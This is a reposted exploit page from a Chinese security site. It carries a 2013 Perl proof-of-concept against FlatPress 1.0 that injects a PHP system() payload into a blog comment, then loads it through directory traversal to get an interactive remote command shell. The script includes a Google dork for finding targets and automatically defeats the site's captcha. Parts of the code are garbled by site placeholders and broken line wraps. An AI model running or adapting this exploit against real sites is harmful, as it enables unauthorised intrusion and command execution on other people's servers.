首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Flatpress 1.0 Traversal / Command Execution
来源:justanotherhacker.com 作者:Wireghoul 发布时间:2013-11-08  
#!/usr/bin/perl
# Exploit Title: Flatpress remore code execution PoC NULLday
# Google Dork: This site is powered by FlatPress.
# Date: 17/10/2013
# Exploit Author: Wireghoul
# Vendor Homepage: http://flatpress.org/home/
# Software Link:
http://downloads.sourceforge.net/project/flatpress/flatpress/FlatPress%201.0%20Solenne/flatpress-1.0-solenne.tar.bz2
# Version: v1.0
#
# Blended threat, executes code injected into comment
# by loading comment as a page through directory traversal
# Requires the inlinePHP plugin to be enabled.
# Written by @Wireghoul - justanotherhacker.com
#
# This is for my peeps and the freaks in the front row -- Hilltop Hoods:
Nosebleed section

use strict;
use warnings;
use LWP::UserAgent;

&banner;
&usage if (!$ARGV[0]);
my $injid = 'Spl0ited'.int(rand(9999));
my $ua = LWP::UserAgent->new;
$ua->timeout(10);
$ua->env_proxy;
$ua->cookie_jar({ file => "tmp/flatpress-rce.txt" });

sub banner {
    print "\nFlatpress remote code execution PoC by \@Wireghoul\n";
    print "=======================[ justanotherhacker.com]==\n";
}

sub usage {
    print "Usage: ___FCKpd___0 <url>\n";
    exit;
}

my $response =
$ua->get("$ARGV[0]/fp-plugins/inlinephp/plugin.inlinephp.php");
if (!$response->is_success) {
    print "[-] Inline PHP plugin not found at
$ARGV[0]/fp-plugins/inlinephp/plugin.inlinephp.php\n";
} else {
    print "[+] Inline PHP plugin found, hopefully it is enabled!\n";
}
# Prepare for exploitation, find entry + comment location
$response = $ua->get($ARGV[0]);
if ($response->is_success) {
    if ($response->decoded_content =~
/(http.*?x=entry:entry.*?;comments:1#comments)/) {
        my $cmntlink = $1;
        print "[+] Found comment link: $cmntlink\n";
        my $aaspam = 0; # Can't be bothered solving easy captchas, just
reload page until we get one we like
        while ($aaspam == 0) {
            $response = $ua->get($cmntlink);
            if ($response->decoded_content =~ /<strong>(\d+) plus (\d+) \?
\(\*\)/) {
                $aaspam = $1+$2;
                print "[+] Defeated antispam $1 + $2 = $aaspam\n";
            } else {
                $response->decoded_content =~ m/<strong>(.*) \? \(\*\)/;
                print "[*] Unknown antispam: $1 ... retrying\n";
            }
        }
        # Post a comment
        $response = $ua->post(
            $cmntlink."form",
            Content => {
                'name' => $injid,
                'email' => '',
                'url' => '',
                'aaspam' => $aaspam,
                'content' =>
"SHELL[exec]system(\
___FCKpd___0
GET['cmd']);[/exec]LLEHS", 'submit' => 'Add', } ); $response = $ua->get($cmntlink); # Find link to injected content, then execute psuedo shell in loop my @cmnts = split (/<li id="comment/, $response->decoded_content); my @injected = grep /$injid/, @cmnts; if ($injected[0] =~ /$injid/) { print "[+] Injection ($injid) successful\n"; $injected[0] =~ m/(http.*?)x=entry:entry(\d\d)(\d\d)(\d\d-\d+);comments:1#comment(\d+-\d+)/; my $shell="$1page=../../content/$2/$3/entry$2$3$4/comments/comment$5"; print "[*] Dropping into shell, type exit to exit\n"; my $line=''; while (1) { print '
; $line=<STDIN>; if ($line =~ /^exit$/) { exit; }; my $output=$ua->get("$shell&cmd=$line"); $output->decoded_content =~ /SHELL(.*)LLEHS/ms; my $clean = $1; $clean =~ s/<br \/>//g; print "$clean\n"; } } else { print '[-] Unable to identify the injection point'; } } else { print "[-] Comment link not found\n"; } } else { die $response->status_line; }
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·VICIdial Manager Send OS Comma
·Symantec Altiris DS SQL Inject
·Vivotek IP Cameras RTSP Authen
·WordPress Curvo Themes - Arbit
·eCryptfs write_tag_3_packet He
·Hanso Converter 2.4.0 - 'ogg'
·Final Draft 8 File Format Stac
·Provj 5.1.5.8 - 'm3u' Buffer O
·StoryBoard Quick 6 Memory Corr
·VideoSpirit Pro 1.90 - (SEH) B
·Avid Media Composer 5.5 - Avid
·VideoSpirit Lite 1.77 - (SEH)
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved